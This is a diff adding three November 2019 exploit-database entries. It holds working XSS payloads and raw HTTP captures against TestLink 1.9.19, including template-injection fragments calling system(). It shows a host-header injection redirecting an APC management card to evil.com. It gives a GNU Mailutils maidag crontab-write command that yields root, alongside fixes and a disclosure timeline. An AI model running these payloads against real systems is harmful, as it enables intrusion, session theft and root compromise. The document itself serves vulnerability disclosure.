DB: 2019-11-22

3 changes to exploits/shellcodes

GNU Mailutils 3.7 - Privilege Escalation
TestLink 1.9.19 - Persistent Cross-Site Scripting
Network Management Card 6.2.0 - Host Header Injection

exploits/hardware/webapps/47702.txt

@@ -0,0 +1,145 @@
+# Exploit Title: TestLink 1.9.19 - Persistent Cross-Site Scripting
+# Date: 2019-11-20
+# Exploit Author: Milad Khoshdel
+# Software Link: http://testlink.org/
+# Version: TestLink 1.9.19
+# Tested on: Linux Apache/2 PHP/7.3.11
+
+
+=========
+Vulnerable Pages:
+=========
+
+Persistent --> https://[TestLink-URL]/testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3
+Non-Persistent --> https://[TestLink-URL]/testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3
+Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&nsextt=%3cscRipt%3ealert(0x00A5CA)%3c%2fscRipt%3e&show_mode=editDisabled&step_id=
+Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&%3cscRipt%3ealert(0x00A5CE)%3c%2fscRipt%3e=nsextt&show_mode=editDisabled
+Non-Persistent --> https://[TestLink-URL]/testlink/lib/testcases/tcEdit.php?doAction=doDeleteStep&show_mode=%3cscRipt%3ealert(0x00A54D)%3c%2fscRipt%3e&step_id=
+
+
+=========
+POC:
+=========
+
+REGUEST -->
+
+GET /testlink/index.php?caller=login&reqURI=javascript%3aalert(0x002082)&viewer=3 HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Connection: Keep-Alive
+Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd
+Referer: http://127.0.0.1/testlink/login.php?viewer=3
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+
+RESPONSE -->
+
+HTTP/1.1 200 OK
+Server: Apache
+Content-Length: 526
+X-Powered-By: PHP/7.3.11
+Pragma: no-cache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Keep-Alive: timeout=5, max=50
+X-Frame-Options: SAMEORIGIN
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Content-Encoding: 
+Date: Wed, 20 Nov 2019 11:29:45 GMT
+Vary: Cookie,Accept-Encoding
+Cache-Control: no-store, no-cache, must-revalidate
+
+<!DOCTYPE html>
+
+<head>
+ <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
+ <meta http-equiv="Content-language" content="en" />
+ <meta name="generator" content="testlink" />
+ <meta name="author" content="TestLink Development Team" />
+ <meta name="copyright" content="TestLink Development Team" />
+ <meta name="robots" content="NOFOLLOW" />
+ <title>TestLink 1.9.19</title>
+ <meta name="description" content="TestLink - TestLink ::: Main Page" />
+ <link rel="icon" href="http://127.0.0.1/testlink/gui/themes/default/images/favicon.ico" type="image/x-icon" />
+</head>
+
+
+<frameset rows="70,*" frameborder="0" framespacing="0">
+ <frame src="lib/general/navBar.php?tproject_id=0&tplan_id=0&updateMainPage=1" name="titlebar" scrolling="no" noresize="noresize" />
+ <frame src="javascript:alert(0x002082)" scrolling='auto' name='mainframe' />
+ <noframes>
+  <body>
+   TestLink required a frames supporting browser.
+  </body>
+ </noframes>
+</frameset>
+
+
+-------------------------------------------------
+
+STEP 1 -->
+
+[Request]
+GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=%3cscRipt%3ealert(0x008B19)%3c%2fscRipt%3e&id=4&show_mode=show&version_id=3 HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Connection: Keep-Alive
+Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TESTLINK197TL_lastTestPlanForUserID_1=2; TL_lastTestProjectForUserID_2=1
+Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+
+[Response]
+HTTP/1.1 200 OK
+Server: Apache
+Content-Length: 0
+X-Powered-By: PHP/7.3.11
+Pragma: no-cache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Keep-Alive: timeout=5, max=47
+X-Frame-Options: SAMEORIGIN
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Date: Wed, 20 Nov 2019 11:59:45 GMT
+Vary: Cookie
+Cache-Control: no-store, no-cache, must-revalidate
+
+STEP 2 -->
+
+[Request]
+GET /testlink/lib/testcases/archiveData.php?add_relation_feedback_msg=Test%20Case%20with%20external%20ID%3A%20%20-%20does%20not%20exist&edit=testcase&id=127.0.0.1/trace.axd&show_mode=show&version_id=3 HTTP/1.1
+Host: 127.0.0.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Connection: Keep-Alive
+Cookie: PHPSESSID=7sjusfplttil0vsrv31ll2on2v; TESTLINK197TL_execSetResults_bn_view_status=0; TESTLINK197TL_execSetResults_platform_notes_view_status=0; TESTLINK197TL_execSetResults_tpn_view_status=0; TESTLINK197ys-tproject_1_ext-comp-1001=a%3As%253A%2F1%2F3; TESTLINK_USER_AUTH_COOKIE=09d24c73361bc02964e80077a0b797b6fc2c1afb74c52ceea74c63311365fadd; TESTLINK197TL_user2_proj1_testPlanId=2; TL_lastTestProjectForUserID_2=1; TESTLINK197TL_lastTestPlanForUserID_1=2
+Referer: http://127.0.0.1/testlink/lib/testcases/tcEdit.php
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
+
+
+[Response]
+#Identification Page
+HTTP/1.1 200 OK
+Transfer-Encoding: chunked
+Server: Apache
+X-Powered-By: PHP/7.3.11
+Pragma: no-cache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Keep-Alive: timeout=5, max=98
+X-Frame-Options: SAMEORIGIN
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Content-Encoding: 
+Date: Wed, 20 Nov 2019 12:02:38 GMT
+Vary: Cookie,Accept-Encoding
+Cache-Control: no-store, no-cache, must-revalidate
+
+ner_title_{php}Smarty_Resource::parseResourceName(system("ns,[container_title_<scRipt>alert(0x008B19)</scRipt>] => container_title_<scRipt>alert(0x008B19)</scRipt>,[container_title_{{_self.env.registerUndefinedFilterCallback("sys

exploits/hardware/webapps/47704.txt

@@ -0,0 +1,47 @@
+# Exploit Title: Network Management Card 6.2.0 - Host Header Injection
+# Google Dork: 
+# Date: 2019-11-21
+# Exploit Author: Amal E Thamban,Kamal Paul
+# Vendor Homepage: https://www.apc.com/in/en/
+# Software Link: https://www.apc.com/shop/in/en/products/Network-Management-Card
+# Version: v6.2.0
+# Tested on: Kali Linux
+# CVE : 
+
+
+Description:Host Header Injection
+
+Product is vulnerable to host header injection because the host header can be changed to something outside the target domain (ie.evil.com) and cause it to redirect to to that domain instead. 
+-------------------------------------------------------------------------------------------------------------------------
+Orginal Request
+GET / HTTP/1.1
+Host: 192.168.10.211
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.10.211/logon.htm
+Connection: close
+Cookie: C0=apc
+Upgrade-Insecure-Requests: 1
+--------------------------------------------------------------------------------------------------------------------------
+Modifed request
+
+GET / HTTP/1.1
+Host: evil.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.10.211/logon.htm
+Connection: close
+Cookie: C0=apc
+Upgrade-Insecure-Requests: 
+---------------------------------------------------------------------------------------------------------------------------
+Response
+
+HTTP/1.1 303 See Other
+Location: http://evil.com/home.htm
+Content-Length: 0
+WebServer:
+Connection: close

exploits/linux/local/47703.txt

@@ -0,0 +1,138 @@
+# Exploit Title: GNU Mailutils 3.7 - Local Privilege Escalation
+# Date: 2019-11-06
+# Exploit Author: Mike Gualtieri
+# Vendor Homepage: https://mailutils.org/
+# Software Link: https://ftp.gnu.org/gnu/mailutils/mailutils-3.7.tar.gz
+# Version: 2.0 <= 3.7
+# Tested on: Gentoo
+# CVE : CVE-2019-18862
+
+Title   : GNU Mailutils / Maidag Local Privilege Escalation
+Author  : Mike Gualtieri :: https://www.mike-gualtieri.com
+Date    : 2019-11-06
+Updated : 2019-11-20
+
+Vendor Affected:   GNU Mailutils :: https://mailutils.org/
+Versions Affected: 2.0 - 3.7
+CVE Designator:    CVE-2019-18862
+
+
+1. Overview
+
+The --url parameter included in the GNU Mailutils maidag utility (versions 2.0
+through 3.7) can abused to write to arbitrary files on the host operating
+system.  By default, maidag is set to execute with setuid root permissions,
+which can lead to local privilege escalation through code/command execution by
+writing to the system's crontab or by writing to other root owned files on the
+operating system.
+
+
+
+2. Detail
+
+As described by the project's homepage, "GNU Mailutils is a swiss army knife of 
+electronic mail handling. It offers a rich set of utilities and daemons for
+processing e-mail".
+
+Maidag, a mail delivery agent utility included in the suite, is by default
+marked to execute with setuid (suid) root permissions.
+
+The --url parameter of maidag can be abused to write to arbitrary files on the 
+operating system.  Abusing this option while the binary is marked with suid 
+permissions allows a low privileged user to write to arbitrary files on the 
+system as root.  Writing to the crontab, for example, may lead to a root shell.
+
+The flaw itself appears to date back to the 2008-10-19 commit, when the --url 
+parameter was introduced to maidag.
+
+	11637b0f - New maidag mode: --url
+	https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=11637b0f262db62b4dc466cefb9315098a1a995a
+
+	maidag/Makefile.am:
+    	chmod 4755 $(DESTDIR)$(sbindir)/$$i;\
+
+
+The following payload will execute arbitrary commands as root and works with 
+versions of maidag, through version 3.7.
+
+	maidag  --url /etc/crontab < /tmp/crontab.in
+
+	The file /tmp/crontab.in would contain a payload like the following.  
+
+	line 1:
+	line 2: */1  *  * * *  root    /tmp/payload.sh
+
+	Please note: For the input to be accepted by maidag, the first line of the
+    file must be blank or be commented.
+
+	In the above example, the file /tmp/payload.sh would include arbitrary 
+    commands to execute as root.
+
+
+Older versions of GNU Mailutils (2.2 and previous) require a different syntax:
+
+	maidag --url 'mbox://user@localhost //etc/crontab' < /tmp/crontab.in
+
+
+
+3. Solution
+
+A fix for the flaw has been made in GNU Mailutils 3.8, which removes the maidag 
+utility, and includes three new utilities that replace its functionality.  
+Details about the new features can be found in the project's release notes:
+
+	https://git.savannah.gnu.org/cgit/mailutils.git/tree/NEWS
+
+Another workaround for those unable to upgrade, is to remove the suid bit on 
+/usr/sbin/maidag (e.g. `chmod u-s /usr/sbin/maidag`).
+
+It should be noted that some Linux distributions already remove the suid bit
+from maidag by default, nullifying this privilege escalation flaw.
+
+Another patch has been made available by Sergey Poznyakoff and posted to the
+GNU Mailutils mailing list, which removes the setuid bit for maidag in all but
+required cases.  The patch is intended for users who can not yet upgrade to
+mailutils 3.8.  The patch has also been made available here:
+https://www.mike-gualtieri.com/files/maidag-dropsetuid.patch
+
+
+
+4. Additional Comments
+
+This vulnerability disclosure was submitted to MITRE Corporation for inclusion
+in the Common Vulnerabilities and Exposures (CVE) database.  The designator
+CVE-2019-18862 has been assigned.
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18862
+https://nvd.nist.gov/vuln/detail/CVE-2019-18862
+
+The NIST National Vulnerability Database (NVD) has assigned the following
+ratings:
+
+CVSS 3.x Severity and Metrics: Base Score: 7.8 HIGH
+CVSS 2.0 Severity and Metrics: Base Score: 4.6 MEDIUM
+
+This disclosure will be updated as new information becomes available.  
+
+
+
+5. History
+
+2019-10-09 Informed Sergey Poznyakoff <gray@gnu.org.ua> of security issue
+
+2019-10-10 Reply from Sergey acknowledging the issue
+
+2019-10-12 Fix available in the GNU Mailutils git repository:
+           739c6ee5 - Split maidag into three single-purpose tools
+           https://git.savannah.gnu.org/cgit/mailutils.git/commit/?id=739c6ee525a4f7bb76b8fe2bd75e81a122764ced
+
+2019-11-06 GNU Mailutils Version 3.8 released to close the issue
+
+2019-11-06 Submission of this vulnerability disclosure to MITRE Corporate to
+           obtain a CVE designator
+
+2019-11-07 Patch offered by Sergey for those unable to upgrade to version 3.8
+
+2019-11-11 CVE-2019-18862 assigned to flaw
+
+2019-11-20 Vulnerability disclosure made publicly available

files_exploits.csv

@@ -10795,6 +10795,7 @@ id,file,description,date,author,type,platform,port
 47695,exploits/windows/local/47695.rb,"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)",2019-11-20,Metasploit,local,windows,
 47696,exploits/windows/local/47696.rb,"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)",2019-11-20,Metasploit,local,windows,
 47701,exploits/unix/local/47701.rb,"Xorg X11 Server - Local Privilege Escalation (Metasploit)",2019-11-20,Metasploit,local,unix,
+47703,exploits/linux/local/47703.txt,"GNU Mailutils 3.7 - Privilege Escalation",2019-11-21,"Mike Gualtieri",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42012,3 +42013,5 @@ id,file,description,date,author,type,platform,port
 47689,exploits/multiple/webapps/47689.md,"Apache Httpd mod_rewrite - Open Redirects",2019-10-14,"Sebastian Neef",webapps,multiple,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,
 47691,exploits/php/webapps/47691.sh,"OpenNetAdmin 18.1.1 - Remote Code Execution",2019-11-20,mattpascoe,webapps,php,
+47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware,
+47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware,